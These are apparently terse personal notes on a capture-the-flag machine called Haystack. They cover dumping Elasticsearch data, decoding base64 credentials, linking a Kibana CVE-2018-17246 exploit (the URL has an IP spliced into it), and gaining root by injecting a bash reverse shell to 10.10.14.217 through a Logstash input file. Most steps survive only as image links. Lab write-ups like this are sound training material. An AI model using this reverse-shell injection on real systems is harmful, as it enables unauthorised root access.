ur - haystack - 10.10.10.115

![1602ad2cb6c3f2273e229eddd3a0d99a.png](:/dad5e551bf6542e9931ad79c26fb1e0c)



![ebf2ad0f67f8e0712d38abb36478c7c2.png](../../_resources/9379da81ca514565a32a9d52d84b0c7f.png)



![10134f30c2e0cb16d3dcf5a210df2d9b.png](../../_resources/e35bd5ed04364edf99c04f484b936c69.png)






Use kibana 6.4 to point to db and list indexs in management


![04a43b3e230e260cdec09fc205d0d42b.png](../../_resources/4de7a26e7adc4419bcbc217a717b50dc.png)



dump data


![901d69ec0988da743b37058ad24071dc.png](../../_resources/9408172aac4541cebea4c852adc615b8.png)


{"_index":"quotes","_type":"quote","_id":"45","_score":1,"_source":{"quote":"Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "}}

I have to save the key for the machine: dXNlcjogc2VjdXJpdHkg
user: security 

{"_index":"quotes","_type":"quote","_id":"111","_score":1,"_source":{"quote":"Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="}}

This key can not miss, I keep it here: cGFzczogc3BhbmlzaC5pcy5rZXk =

pass: spanish.is.key


https://github.com/mpgn/CVE-10.10.14.2172018-17246



upgrade shell


![d89e35595dfd4393d9360b21523961b3.png](../../_resources/810cb8bafd584819a71158766a60bffe.png)



Privesc


![9d97a307cab042790868f69305eb3398.png](../../_resources/d7a86515473b4334bd9c4e0f3e28cb9b.png)


![362d9eb2a63908aa87ed984f32c7f28f.png](../../_resources/0fefa38782394af1a09ff89e03219fab.png)




Looks like command injection via a logstash message

echo “Ejecutar comando: bash -i >& /dev/tcp/10.10.14.217/1338 0>&1” > /opt/kibana/logstash_9999.txt

after 10 secs command executed and root shell gained
